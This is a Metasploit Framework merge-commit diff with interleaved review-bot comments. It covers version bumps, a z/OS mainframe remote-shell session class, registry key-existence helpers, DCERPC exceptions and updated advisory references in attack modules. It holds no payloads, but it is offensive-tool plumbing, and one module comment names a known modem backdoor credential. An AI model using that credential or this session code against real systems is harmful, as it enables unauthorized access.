Merge branch 'upstream-master' into land-6120-python-stageless

This commit is contained in:
Brent Cook 2015-10-30 17:26:26 -05:00
commit be23da1c1f
230 changed files with 1395 additions and 429 deletions


@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.11.4)
metasploit-framework (4.11.5)
actionpack (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
bcrypt
@ -21,14 +21,14 @@ PATH
rubyzip (~> 1.1)
sqlite3
tzinfo
metasploit-framework-db (4.11.4)
metasploit-framework-db (4.11.5)
activerecord (>= 4.0.9, < 4.1.0)
metasploit-credential (= 1.0.1)
metasploit-framework (= 4.11.4)
metasploit_data_models (= 1.2.7)
metasploit-framework (= 4.11.5)
metasploit_data_models (= 1.2.9)
pg (>= 0.11)
metasploit-framework-pcap (4.11.4)
metasploit-framework (= 4.11.4)
metasploit-framework-pcap (4.11.5)
metasploit-framework (= 4.11.5)
network_interface (~> 0.0.1)
pcaprub
@ -126,7 +126,7 @@ GEM
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (1.0.15)
metasploit_data_models (1.2.7)
metasploit_data_models (1.2.9)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
arel-helpers
@ -140,7 +140,7 @@ GEM
mime-types (2.6.1)
mini_portile (0.6.2)
minitest (4.7.5)
msgpack (0.6.2)
msgpack (0.7.0)
multi_json (1.11.2)
multi_test (0.1.2)
network_interface (0.0.1)
@ -221,7 +221,7 @@ GEM
actionpack (>= 3.0)
activesupport (>= 3.0)
sprockets (>= 2.8, < 4.0)
sqlite3 (1.3.10)
sqlite3 (1.3.11)
thor (0.19.1)
thread_safe (0.3.5)
tilt (1.4.1)


@ -32,7 +32,7 @@ module Metasploit
MAJOR = 4
MINOR = 11
PATCH = 4
PATCH = 5
PRERELEASE = 'dev'
HASH = get_hash
end


@ -638,13 +638,10 @@ class ReadableText
# @param col [Integer] the column wrap width.
# @return [String] the formatted list of running jobs.
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
columns = [ 'Id', 'Name' ]
columns = [ 'Id', 'Name', "Payload", "LPORT" ]
if (verbose)
columns << "Payload"
columns << "LPORT"
columns << "URIPATH"
columns << "Start Time"
columns += [ "URIPATH", "Start Time" ]
end
tbl = Rex::Ui::Text::Table.new(
@ -653,16 +650,19 @@ class ReadableText
'Columns' => columns
)
# jobs are stored as a hash with the keys being a numeric job_id.
framework.jobs.keys.sort{|a,b| a.to_i <=> b.to_i }.each { |k|
# Job context is stored as an Array with the 0th element being
# the running module. If that module is an exploit, ctx will also
# contain its payload.
ctx = framework.jobs[k].ctx
row = [ k, framework.jobs[k].name ]
row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
row << (ctx[0].datastore['LPORT'] || "")
if (verbose)
ctx = framework.jobs[k].ctx
uripath = ctx[0].get_resource if ctx[0].respond_to?(:get_resource)
uripath = ctx[0].datastore['URIPATH'] if uripath.nil?
row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
row << (ctx[0].datastore['LPORT'] || "")
row << (uripath || "")
row << (framework.jobs[k].start_time || "")
end
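Review bot: The payload and LPORT derivation at `row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)` and the LPORT line below it now run for every job rather than only under `verbose`, so a job whose `ctx[0]` has no `datastore` (presumably possible for non-module jobs; confirm) would break the whole `jobs` listing instead of only the verbose one. `framework.jobs[k]` is also looked up several times per row; hoisting `job = framework.jobs[k]` at the top of the block and using `job.ctx`, `job.name` and `job.start_time` reads more clearly. If the `@param verbose` entry above the hunk still describes Payload and LPORT as verbose-only columns, it should now say that only URIPATH and Start Time are added. The iteration block continues outside the hunk.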


@ -0,0 +1,149 @@
# -*- coding: binary -*-
require 'msf/base/sessions/command_shell'
module Msf::Sessions
###
#
# This class provides basic interaction with a Unix Systems Service
# command shell on a mainframe (IBM System Z) running Z/OS
# This session is initialized with a stream that will be used
# as the pipe for reading and writing the command shell.
#
# Date: Oct 8, 2015
# Author: Bigendian Smalls
#
###
class MainframeShell < Msf::Sessions::CommandShell
#
# This interface supports basic interaction.
#
include Msf::Session::Basic
#
# This interface supports interacting with a single command shell.
#
include Msf::Session::Provider::SingleCommandShell
##
#
# initialize as mf shell session
#
def initialize(*args)
self.platform = "mainframe"
self.arch = "zarch"
self.translate_1047 = true
super
end
##
#
# Returns the session description.
#
def desc
"Mainframe shell"
end
##
#
# override shell_read to include decode of cp1047
#
def shell_read(length=-1, timeout=1)
#mfimpl
if self.respond_to?(:ring)
return Rex::Text.from_ibm1047(shell_read_ring(length,timeout))
end
begin
rv = Rex::Text.from_ibm1047(rstream.get_once(length, timeout))
framework.events.on_session_output(self, rv) if rv
return rv
rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
shell_close
raise e
end
end
##
#
# override shell_write to include encode of cp1047
#
def shell_write(buf)
#mfimpl
return unless buf
begin
framework.events.on_session_command(self, buf.strip)
rstream.write(Rex::Text.to_ibm1047(buf))
rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
shell_close
raise e
end
end
def execute_file(full_path, args)
#mfimpl
raise NotImplementedError
end
# need to do more testing on this before we either use the default in command_shell
# or write a new one. For now we just make it unavailble. This prevents a hang on
# initial session creation. See PR#6067
undef_method :process_autoruns
def desc
"Mainframe USS session"
end
attr_accessor :translate_1047 # tells the session whether or not to translate
# ebcdic (cp1047) <-> ASCII for certain mainframe payloads
# this will be used in post modules to be able to switch on/off the
# translation on file transfers, for instance
protected
##
#
# _interact_ring overridden to include decoding of cp1047 data
#
def _interact_ring
begin
rdr = framework.threads.spawn("RingMonitor", false) do
seq = nil
while self.interacting
# Look for any pending data from the remote ring
nseq,data = ring.read_data(seq)
# Update the sequence number if necessary
seq = nseq || seq
# Write output to the local stream if successful
user_output.print(Rex::Text.from_ibm1047(data)) if data
begin
# Wait for new data to arrive on this session
ring.wait(seq)
rescue EOFError => e
print_error("EOFError: #{e.class}: #{e}")
break
end
end
end
while self.interacting
# Look for any pending input or errors from the local stream
sd = Rex::ThreadSafe.select([ _local_fd ], nil, [_local_fd], 5.0)
# Write input to the ring's input mechanism
shell_write(user_input.gets) if sd
end
ensure
rdr.kill
end
end
end
end
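Review bot: `desc` is defined twice in the new class, once returning "Mainframe shell" and again below `undef_method :process_autoruns` returning "Mainframe USS session"; the second definition silently replaces the first, so one of them should be deleted. In `_interact_ring`, `ensure rdr.kill` raises NoMethodError on nil if `framework.threads.spawn` itself fails before `rdr` is assigned, which would mask the original error; `rdr.kill if rdr` avoids that. The `#mfimpl` markers on `shell_read`, `shell_write` and `execute_file` tell a reader nothing; the one on `execute_file` in particular could state why the operation is unsupported here, in the way the comment above `undef_method :process_autoruns` explains that decision.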


@ -342,14 +342,18 @@ class EncodedPayload
self.nop_sled = nop.generate_sled(self.nop_sled_size,
'BadChars' => reqs['BadChars'],
'SaveRegisters' => save_regs)
if nop_sled && nop_sled.length == nop_sled_size
break
else
dlog("#{pinst.refname}: Nop generator #{nop.refname} failed to generate sled for payload", 'core', LEV_1)
end
rescue
dlog("#{pinst.refname}: Nop generator #{nop.refname} failed to generate sled for payload: #{$!}",
'core', LEV_1)
self.nop = nil
end
break
}
if (self.nop_sled == nil)
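Review bot: A generator that returns a sled of the wrong length takes the new `else` branch, logs, and leaves that sled in `self.nop_sled`, so the `if (self.nop_sled == nil)` check at the end of the hunk cannot detect the failure when it happens on the last generator tried; the `else` branch should also set `self.nop_sled = nil` (the `rescue` branch clears `self.nop` but not the sled either). The parallel hunk in `Msf::Exploit` has the same gap: its `else` leaves the wrong-length sled in the local `nop_sled` that is returned on that hunk's last line, and neither its `else` nor its `rescue` resets it. The `begin` and the surrounding iteration block start outside both hunks.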


@ -1034,12 +1034,16 @@ class Exploit < Msf::Module
nop_sled = nop.generate_sled(count,
'BadChars' => payload_badchars || '',
'SaveRegisters' => save_regs)
if nop_sled && nop_sled.length == count
break
else
wlog("#{self.refname}: Nop generator #{nop.refname} failed to generate sled for exploit", 'core', LEV_0)
end
rescue
wlog("#{self.refname}: Nop generator #{nop.refname} failed to generate sled for exploit: #{$!}",
'core', LEV_0)
end
break
}
nop_sled


@ -145,6 +145,19 @@ module Registry
end
end
# Checks if a key exists on the target registry
#
# @param key [String] the full path of the key to check
# @return [Boolean] true if the key exists on the target registry, false otherwise
# (also in case of error)
def registry_key_exist?(key)
if session_has_registry_ext
meterpreter_registry_key_exist?(key)
else
shell_registry_key_exist?(key)
end
end
protected
#
@ -310,6 +323,26 @@ protected
shell_registry_cmd_result("add /f \"#{key}\" /v \"#{valname}\" /t \"#{type}\" /d \"#{data}\" /f", view)
end
# Checks if a key exists on the target registry using a shell session
#
# @param key [String] the full path of the key to check
# @return [Boolean] true if the key exists on the target registry, false otherwise,
# even if case of error (invalid arguments) or the session hasn't permission to
# access the key
def shell_registry_key_exist?(key)
begin
key = normalize_key(key)
rescue ArgumentError
return false
end
results = shell_registry_cmd("query \"#{key}\"")
if results =~ /ERROR: /i
return false
else
return true
end
end
##
# Meterpreter-specific registry manipulation methods
@ -515,6 +548,27 @@ protected
end
end
# Checks if a key exists on the target registry using a meterpreter session
#
# @param key [String] the full path of the key to check
# @return [Boolean] true if the key exists on the target registry, false otherwise
# (also in case of error)
def meterpreter_registry_key_exist?(key)
begin
root_key, base_key = session.sys.registry.splitkey(key)
rescue ArgumentError
return false
end
begin
check = session.sys.registry.check_key_exists(root_key, base_key)
rescue Rex::Post::Meterpreter::RequestError, TimesoutError
return false
end
check
end
#
# Normalize the supplied full registry key string so the root key is sane. For
# instance, passing "HKLM\Software\Dog" will return 'HKEY_LOCAL_MACHINE\Software\Dog'
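Review bot: `rescue Rex::Post::Meterpreter::RequestError, TimesoutError` in `meterpreter_registry_key_exist?` names a constant that looks misspelled; the `Registry.check_key_exists` doc added in this same commit says it raises `TimeoutError`, and because rescue-clause constants are resolved only when an exception propagates, a timeout would surface as NameError instead of the documented false. The line should read `rescue Rex::Post::Meterpreter::RequestError, TimeoutError` (or whichever timeout class the client actually raises; confirm). In `shell_registry_key_exist?`, a nil `results` makes `results =~ /ERROR: /i` nil and the method returns true; `!results.nil? && results !~ /ERROR: /i` after the `normalize_key` guard returns false in that case and replaces the if/else. The `protected` section these helpers live in begins outside the hunks.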


@ -481,15 +481,17 @@ private
def _valid_session(sid,type)
s = self.framework.sessions[sid.to_i]
if(not s)
error(500, "Unknown Session ID")
error(500, "Unknown Session ID #{sid}")
end
if type == "ring"
if not s.respond_to?(:ring)
error(500, "Session #{s.type} does not support ring operations")
end
elsif (s.type != type)
elsif (type == 'meterpreter' && s.type != type) ||
(type == 'shell' && s.type == 'meterpreter')
error(500, "Session is not of type " + type)
end
s
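Review bot: The new `elsif` only validates `type == 'meterpreter'` and `type == 'shell'`; for any other `type` string the old `s.type != type` rejection is gone and every session is accepted, which looks like an unintended widening unless callers never pass other values. A fallback that keeps the old behaviour for unlisted types while preserving the new shell rule: `elsif (type == 'shell' && s.type == 'meterpreter') || (type != 'shell' && s.type != type)`. The `"Session is not of type " + type` message could use interpolation like the `"Unknown Session ID #{sid}"` line above it.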


@ -77,6 +77,22 @@ class Registry
client, root_key, base_key, perm, response.get_tlv(TLV_TYPE_HKEY).value)
end
# Checks if a key exists on the target registry
#
# @param root_key [String] the root part of the key path. Ex: HKEY_LOCAL_MACHINE
# @param base_key [String] the base part of the key path
# @return [Boolean] true if the key exists on the target registry, false otherwise, even
# it the session hasn't permissions to access the target key.
# @raise [TimeoutError] if the timeout expires when waiting the answer
# @raise [Rex::Post::Meterpreter::RequestError] if the parameters are not valid
def Registry.check_key_exists(root_key, base_key)
request = Packet.create_request('stdapi_registry_check_key_exists')
request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
response = client.send_request(request)
return response.get_tlv(TLV_TYPE_BOOL).value
end
#
# Opens the supplied registry key on the specified remote host. Requires that the
# current process has credentials to access the target and that the target has the
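Review bot: `response.get_tlv(TLV_TYPE_BOOL).value` raises NoMethodError on nil if the response carries no boolean TLV (presumably possible when the remote side does not implement `stdapi_registry_check_key_exists`; confirm), which is neither of the two documented `@raise` cases. Either document that outcome or handle a missing TLV explicitly, e.g. `tlv = response.get_tlv(TLV_TYPE_BOOL)` followed by `tlv ? tlv.value : false`, and state in the docstring that an absent TLV is reported as false. The docstring's "even it the session hasn't permissions to access the target key" should read "even if the session does not have permission to access the target key". The explicit `return` on the last line is unnecessary.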


@ -57,7 +57,7 @@ require 'rex/proto/smb/exceptions'
case self.handle.protocol
when 'ncacn_ip_tcp'
if self.socket.type? != 'tcp'
raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
end
when 'ncacn_np'
if self.socket.class == Rex::Proto::SMB::SimpleClient::OpenPipe
@ -65,11 +65,11 @@ require 'rex/proto/smb/exceptions'
elsif self.socket.type? == 'tcp'
self.smb_connect()
else
raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
end
# No support ncacn_ip_udp (is it needed now that its ripped from Vista?)
else
raise "Unsupported protocol : #{self.handle.protocol}"
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "Unsupported protocol : #{self.handle.protocol}"
end
end
@ -255,7 +255,7 @@ require 'rex/proto/smb/exceptions'
bind, context = Rex::Proto::DCERPC::Packet.make_bind(*self.handle.uuid)
end
raise 'make_bind failed' if !bind
raise ::Rex::Proto::DCERPC::Exceptions::BindError, 'make_bind failed' if !bind
self.write(bind)
raw_response = self.read()
@ -264,11 +264,11 @@ require 'rex/proto/smb/exceptions'
self.last_response = response
if response.type == 12 or response.type == 15
if self.last_response.ack_result[context] == 2
raise "Could not bind to #{self.handle}"
raise ::Rex::Proto::DCERPC::Exceptions::BindError, "Could not bind to #{self.handle}"
end
self.context = context
else
raise "Could not bind to #{self.handle}"
raise ::Rex::Proto::DCERPC::Exceptions::BindError, "Could not bind to #{self.handle}"
end
end
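Review bot: The `raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "Unsupported protocol : #{self.handle.protocol}"` on the `else` arm reports an unrecognised `handle.protocol`, not a bad socket, and since `InvalidSocket#to_s` prefixes "Invalid Socket." the rendered message becomes "Invalid Socket. Unsupported protocol : …"; a dedicated subclass of `Exceptions::Error` would fit that arm better. The three `ack, …` messages will likewise render behind the "Invalid Socket." prefix, so the "ack," lead-in can be dropped. The method containing the `case` starts outside the first hunk, and the binding method's body continues outside the last one.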


@ -132,6 +132,32 @@ class NoResponse < Error
end
end
class BindError < Error
def initialize(message=nil)
@message = message
end
def to_s
str = 'Failed to bind.'
if @message
str += " #{@message}"
end
end
end
class InvalidSocket < Error
def initialize(message=nil)
@message = message
end
def to_s
str = 'Invalid Socket.'
if @message
str += " #{@message}"
end
end
end
class InvalidPacket < Error
def initialize(message = nil)
@message = message


@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
# Metasploit::Credential database models
spec.add_runtime_dependency 'metasploit-credential', '1.0.1'
# Database models shared between framework and Pro.
spec.add_runtime_dependency 'metasploit_data_models', '1.2.7'
spec.add_runtime_dependency 'metasploit_data_models', '1.2.9'
# depend on metasploit-framewrok as the optional gems are useless with the actual code
spec.add_runtime_dependency 'metasploit-framework', "= #{spec.version}"
# Needed for module caching in Mdm::ModuleDetails


@ -28,9 +28,8 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'BID', '19680' ],
[ 'CVE', '2006-4313' ],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml' ],
[ 'OSVDB', '28139' ],
[ 'OSVDB', '28138' ],
[ 'OSVDB', '28138' ]
],
'DisclosureDate' => 'Aug 23 2006'))


@ -33,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2011-0923' ],
[ 'OSVDB', '72526' ],
[ 'ZDI', '11-055' ],
[ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html' ],
[ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux' ]
],
'Author' =>


@ -46,8 +46,8 @@ class Metasploit3 < Msf::Auxiliary
'References' => [
[ 'CVE', '2015-0964' ], # XSS vulnerability
[ 'CVE', '2015-0965' ], # CSRF vulnerability
[ 'CVE', '2015-0966' ], # "techician/yZgO8Bvj" web interface backdoor
[ 'URL', 'https://community.rapid7.com/rapid7_blogpostdetail?id=a111400000AanBs' ] # Original disclosure
[ 'CVE', '2015-0966' ], # "techician/yZgO8Bvj" web interface backdoor
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems' ],
]
))


@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'EDB', '25252' ],
[ 'OSVDB', '93013' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ],
[ 'URL', 'http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ]
],
'Author' => [
'Michael Messner <devnull[at]s3cur1ty.de>'


@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '89912' ],
[ 'BID', '57760' ],
[ 'EDB', '24475' ],
[ 'URL', 'http://homesupport.cisco.com/de-eu/support/routers/E1500' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
],
'DisclosureDate' => 'Feb 05 2013'))


@ -29,7 +29,6 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
[ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
[ 'EDB', '24202' ],


@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2014-7862'],
['OSVDB', '116554'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/2']
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/2'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt'],
],
'DisclosureDate' => 'Dec 31 2014'))


@ -36,8 +36,8 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2014-7863'],
['OSVDB', '117696'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114']
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
],
'DisclosureDate' => 'Jan 28 2015'))


@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2014-7863'],
['OSVDB', '117695'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114']
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
],
'DisclosureDate' => 'Jan 28 2015'))


@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2014-8499' ],
[ 'OSVDB', '114485' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ]
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt' ],
],
'DisclosureDate' => 'Nov 8 2014'))


@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2014-5445' ],
[ 'OSVDB', '115340' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Dec/9' ]
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Dec/9' ],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]
],
'DisclosureDate' => 'Nov 30 2014'))


@ -29,9 +29,7 @@ class Metasploit4 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ],
# Fill this in with the direct advisory URL from Infigo
[ 'URL', 'http://www.infigo.hr/in_focus/advisories/' ]
[ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ]
],
'DefaultOptions' => {
'SSL' => true


@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2015-2993' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt' ],
],
'DisclosureDate' => 'Jun 3 2015'))


@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2015-2996'],
['CVE', '2015-2997'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt'],
],
'DisclosureDate' => 'Jun 3 2015'))


@ -29,8 +29,8 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2015-2996'],
['CVE', '2015-2998'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt']
],
'DisclosureDate' => 'Jun 3 2015'))


@ -21,11 +21,7 @@ class Metasploit3 < Msf::Auxiliary
as well as read privileges to the target file.
},
'Author' => [ 'todb' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://michaeldaw.org/sql-injection-cheat-sheet#postgres' ]
]
'License' => MSF_LICENSE
))
register_options(


@ -99,7 +99,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{peer} - Executing the command...")
begin
return psexec(execute)
rescue Rex::Proto::SMB::Exceptions::Error => exec_command_error
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => exec_command_error
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
return false
end
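Review bot: The added `elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)` references `e`, but the rescued exception is bound to `exec_command_error` on the line above, so unless an `e` is in scope from earlier in the method (the hunk does not show one) the first SMB or DCERPC failure raises NameError from inside the rescue clause, masking the original error and skipping the `print_error` and `return false` path. Use the bound name: `elog("#{exec_command_error.class} #{exec_command_error.message}\n#{exec_command_error.backtrace * "\n"}", 'rex', LEV_3)`. The enclosing method starts outside the hunk.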


@ -34,8 +34,7 @@ class Metasploit3 < Msf::Auxiliary
['CVE', '2003-0027'],
['OSVDB', '8201'],
['BID', '6665'],
['URL', 'http://marc.info/?l=bugtraq&m=104326556329850&w=2'],
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1']
['URL', 'http://marc.info/?l=bugtraq&m=104326556329850&w=2']
],
# Tested OK against sol8.tor 20100624 -jjd
'DisclosureDate' => 'Jan 22 2003')


@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://github.com/claudijd/BNAT-Suite'],
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
[ 'URL', 'https://github.com/claudijd/bnat' ],
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels']
]
)
register_options(


@ -25,8 +25,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://github.com/claudijd/BNAT-Suite'],
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
[ 'URL', 'https://github.com/claudijd/bnat'],
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels']
]
)


@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'BID', '1154'],
[ 'CVE', '2000-0380'],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20000514-ios-http-server.shtml'],
[ 'OSVDB', '1302' ],
],
'DisclosureDate' => 'Apr 26 2000'))


@ -30,8 +30,7 @@ class Metasploit4 < Msf::Auxiliary
'References' => [
['CVE', '2015-5477'],
['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],
['URL', 'https://kb.isc.org/article/AA-01272'],
['URL', 'https://github.com/rapid7/metasploit-framework/issues/5790']
['URL', 'https://kb.isc.org/article/AA-01272']
],
'DisclosureDate' => 'Jul 28 2015',
'License' => MSF_LICENSE,


@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html' ],
[ 'BID', '16838' ],
[ 'OSVDB', '23511' ],
[ 'CVE', '2006-0900' ],


@ -30,7 +30,6 @@ class Metasploit4 < Msf::Auxiliary
'References' =>
[
['CVE', '2014-0050'],
['URL', 'http://markmail.org/message/kpfl7ax4el2owb3o'],
['URL', 'http://tomcat.apache.org/security-8.html'],
['URL', 'http://tomcat.apache.org/security-7.html']
],


@ -26,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2013-3843'],
['OSVDB', '93853'],
['BID', '60333'],
['URL', 'http://bugs.monkey-project.com/ticket/182']
['BID', '60333']
],
'DisclosureDate' => 'May 30 2013'))


@ -29,8 +29,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2005-4797' ],
[ 'BID', '14510' ],
[ 'OSVDB', '18650' ],
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
[ 'OSVDB', '18650' ]
]
))


@ -29,7 +29,7 @@ class Metasploit4 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2012-2686'],
[ 'URL', 'https://www.openssl.org/news/secadv_20130205.txt']
[ 'URL', 'https://www.openssl.org/news/secadv/20130205.txt' ]
],
'DisclosureDate' => 'Feb 05 2013'))


@ -19,10 +19,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => ["Sil3nt_Dre4m"],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://kaillerahacks.blogspot.com/2011/07/kaillera-server-086-dos-vulnerability.html' ]
],
'DisclosureDate' => 'Jul 2 2011'))
register_options([


@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'OSVDB', '50617' ],
[ 'BID', '5817' ],
[ 'URL', 'http://sh0dan.org/oldfiles/hackingcitrix.html' ],
[ 'BID', '5817' ]
]
))


@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'],
['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf']
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html']
]))
register_options([


@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2014-6039' ],
[ 'OSVDB', '114342' ],
[ 'OSVDB', '114344' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]
],
'DisclosureDate' => 'Nov 5 2014'))


@ -70,8 +70,7 @@ class Metasploit3 < Msf::Auxiliary
[
['CWE', '425'],
['CVE', '2013-6031'],
['US-CERT-VU', '341526'],
['URL', 'http://www.huaweidevice.co.in/Support/Downloads/'],
['US-CERT-VU', '341526']
],
'DisclosureDate' => "Nov 11 2013" ))


